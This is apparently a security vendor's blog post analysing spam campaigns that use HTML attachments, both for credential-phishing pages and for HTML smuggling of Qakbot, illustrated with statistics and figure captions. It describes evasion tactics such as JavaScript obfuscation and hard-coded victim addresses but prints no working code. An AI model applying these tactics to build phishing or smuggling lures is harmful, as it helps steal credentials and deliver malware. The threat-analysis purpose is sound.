CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway. Learn More

CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway. Learn More

Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Offensive Security
Solutions to maximize your security ROI
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

HTML File Attachments: Still A Threat


This past month, Trustwave SpiderLabs observed that HTML (Hypertext Markup Language) file attachments had become a common occurrence in our spam traps, which is not unusual since malware is often delivered through phishing spam. For the past 30 days, SpiderLabs has found the combination of .HTML (11.39%) and .HTM (2.7%) files are our second most spammed file attachment, totaling 14.09%, followed by .EXE files at 12.84%. 


Figure 1: HTML file attachment type percentages

These threat actors are phishers, the main purpose is to steal sensitive information (like login credentials and credit card information) either for identity theft, extortion, to get access to the victim's finances, to buy goods or services, etc.

According to Microsoft, cybercriminal group DEV-0238 and DEV-0253 have also been sending HTML attachments that use HTML smuggling to deliver keyloggers. Microsoft has also attributed HTML smuggling to cybercriminal group DEV-0193 with HTML smuggling to deliver Trickbot malware.

Phishing attacks using HTML attachments

The most common spammed HTML attachments seen are phishing pages. The HTML file itself is generally benign, meaning it does not have any malicious code that launches arbitrary code into the system. This attachment, however, should be treated with caution. It mimics the sign-in page for services like Microsoft, Google or online banking pages and the danger is when a user falls for the scam, enters their credentials into the form, and submits it.  


Figure 2: Samples of phishing email with HTML attachments


Figure 3: HTML attachments that mimic Microsoft sign-in page. The phishing page may also have the target user’s email address hard-coded in the page.

SpiderLabs noticed that recent phishing HTML files contained the hard-coded email addresses of the target user – this makes it more convincing to the victim. In the source level, adversaries would employ various levels of code obfuscation. JavaScript codes are usually obfuscated with open-source tools like JavaScript Obfuscator. HTML files are not stand-alone though, as they pull additional jQuery library, CSS and JavaScript code from various remote web servers for handling form objects, and form actions.

Hard-coding the email addresses helps trick the victim into believing they had previously signed-on to the page, since they only need to enter their password. Overall, this tactic makes the email appear more legitimate.

Below is an HTML source from one of the phishing attacks. It shows the level of JavaScript obfuscation.


Figure 4: Phishing HTML source code

In most instances, the HTML file is not fully autonomous. The JavaScript source injected as inline scripts are usually loaded from a remote server, from a mixture of legitimate CDN (content delivery network) hosts, or from the host operated by the actors. Usually, the JavaScript that handles the data exfiltration is hosted by the actor’s web server (or operated by them).  


Figure 5: Inspecting the HTML source shows the JavaScript files it pulls from the remote web server.


Figure 6: A JavaScript code loaded from the remote host ( by the HTML attachment file. It handles additional HTML DOM form actions, jQuery objects, CSS styling as well as anti-debugging and URL form checking.

Malware Delivery using HTML smuggling

To evade email gateways, a technique called HTML smuggling is being utilized by adversaries to deliver malware binary to a target user. This method employs HTML 5 that could work offline by storing a binary in an immutable blob of data in the form of a JavaScript code. When opened through a web browser, the data blob gets decoded into a file object. A download notification bar is then displayed to the user. With a combination of social engineering, it lures the target user to save the binary to the disk to open it.

The screenshot below is an example of a spam campaign with an HTML file attachment.


Figure 7: An example of a Qakbot spam campaign that uses HTML file attachment

When loaded into a browser, the HTML file invokes a JavaScript that seemingly looks like a file was downloaded from a remote web server. The zip file, however, is smuggled within the HTML source as a data blob, gets decoded by the JavaScript code and converted into a ZIP file.


Figure 8: File smuggling

The HTML source would look something like the screenshot below:


Figure 8.1: HTML source example

Shown below is the attack flow overview:


Figure 9: Attack flow overview


As you can see, obfuscation is the common denominator of this spammed HTML attachment. This just shows how difficult it is to detect this kind of threat in the email gateway layer. Although most of the time HTML files are benign when opened, the danger is subsequent to the user’s action. Coupled with social engineering, this is what makes this type of attack successful.


















Phishing HTML attachment

ScannedDocuments_9720709.html : Qakbot

ScannedDocuments_9720709.img : Qakbot

Latest SpiderLabs Blogs

Fake Dialog Boxes to Make Malware More Convincing

Let’s explore how SpiderLabs created and incorporated user prompts, specifically Windows dialog boxes into its malware loader to make it more convincing to phishing targets during a Red Team...

Read More

The Secret Cipher: Modern Data Loss Prevention Solutions

This is Part 7 in my ongoing project to cover 30 cybersecurity topics in 30 weekly blog posts. The full series can be found here. Far too many organizations place Data Loss Prevention (DLP) and Data...

Read More

CVE-2024-3400: PAN-OS Command Injection Vulnerability in GlobalProtect Gateway

UPDATE: Palo Alto Networks confirmed on Tuesday (4/16) that disabling device telemetry is no longer considered an effective mitigation. On Wednesday (4/17), the company released new threat signatures...

Read More